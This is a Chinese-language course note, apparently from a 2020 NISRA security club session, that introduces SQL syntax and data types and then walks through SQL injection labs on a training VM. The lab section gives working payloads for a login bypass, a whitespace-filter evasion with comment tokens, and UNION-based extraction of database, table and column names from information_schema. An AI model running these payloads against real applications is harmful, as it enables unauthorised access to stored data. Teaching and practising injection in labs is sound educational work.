---
title: Basic SQLi
---
# Basic SQLi by Chess
> [slides](https://slides.com/chesskuo/200826_sqli/fullscreen)
> [課程影片連結](https://youtu.be/HEYYIkkCJis)
> [slido 匿名發問](https://app.sli.do/event/rux28f3w/live/questions)(連結已關閉)
:::info
- 請大家先下載這個 VM 唷 (1.7G)
bit.ly/sqli_vm
- 還有 VBox 需要裝擴充套件 VM 才開的起來喔
VirtualBox 6.1.12 Oracle VM VirtualBox Extension Pack
[點我下載](https://download.virtualbox.org/virtualbox/6.1.12/Oracle_VM_VirtualBox_Extension_Pack-6.1.12.vbox-extpack)
:::
## Build Environment
[vm](bit.ly/sqli_vm)
## What is SQL
- Sructured Query Language
### How to use
- Create
- Read
- Update
- Delete
### Syntax
- SHOW
- CREATE
- 建立表或資料庫
- ex.
```SQL
CREATE DATABASE <db_name>;
CREATE TABLE <tb_name>(
<col_name1> type,
<col_name2> type
);```
- USE
- 使用資料庫
- 如要操作table要先USE
- ex. USE <db_name>;
- DROP
- 刪除
- ex. DROP DATABASE <db_name>;
- SELECT
- 搜索資料
- ex. SELECT <col_name> FROM <tb_name>;
- WHERE
- 設定檢索條件用
- 可配合OR 和 AND
- ex. SELECT * FROM test WHERE id=100;
- ORDER BY
- ASC 正序(default)
- DESC 反序
- ex. SELECT * FROM people ORDER BY money DESC; (有錢的會在頂端)
- LIMIT
- 限制輸出數量
- ex. SELECT * FROM <tb_name> LIMIT <from>,<n>
- UNION
- INSERT
- 插入資料到table中
- ex. INSERT INTO <tb_name> VALUES (<1>, ...);
- DELETE
- 刪除資料
- UPDATE
- 更新資料內容
- ex.
```SQL
UPDATE <tb_name> SET <col_name1> = <value>, ... WHERE <condition>;
- LIKE
### Type
#### Number
- INT(4bytes)
- TINYINT(1byte)
- SMALLINT(2bytes)
- BIGINT(8bytes)
- FLOAT
- DOUBLE
#### String
- CHAR
- VARCHAR
#### Date
- DATE
- TIME
- DATETIME
- TIMESTAMP
## What is SQLi
刻意拼湊SQL語句來獲取資訊或攻擊
## SQLi Labs
### sqli 01
```sql
admin')#
```
#可用%23代替
### sqli 02
- `/**/` 可以取代 sql 中的空白,因此可以繞過 `preg_replace`
- 利用原本語法最後的單引號關閉 `admin` 字串
```sql
'/**/or/**/username='admin
```
### sqli 03
- 首先猜出有幾個 col,發現為 4,發現 2, 3 出現在了輸出中,可以利用這兩個來 leak 出所需的資訊
```sql
' union select 1,2,3,4#
```
- 接著 leak 出 server 中有哪些 db
```sql
' union select 1,2,group_concat(schema_name),4 from information_schema.schemata#
```
- 找 `labs` 這個 db 中有哪些 table
```sql
' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='labs'#
```
- 找 `users` 這個 table 中有哪些 column
```sql
' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='labs' and table_name='users'#
```
- 得到有 `flag` 這個 column
```sql
' union select 1,2,group_concat(flag),4 from labs.users#
```
---
###### tags: `Enlightened` `NISRA` `2020`
<style>
.navbar-brand::after { content: " × NISRA"; }
</style>
Sign in with Wallet
Connect another wallet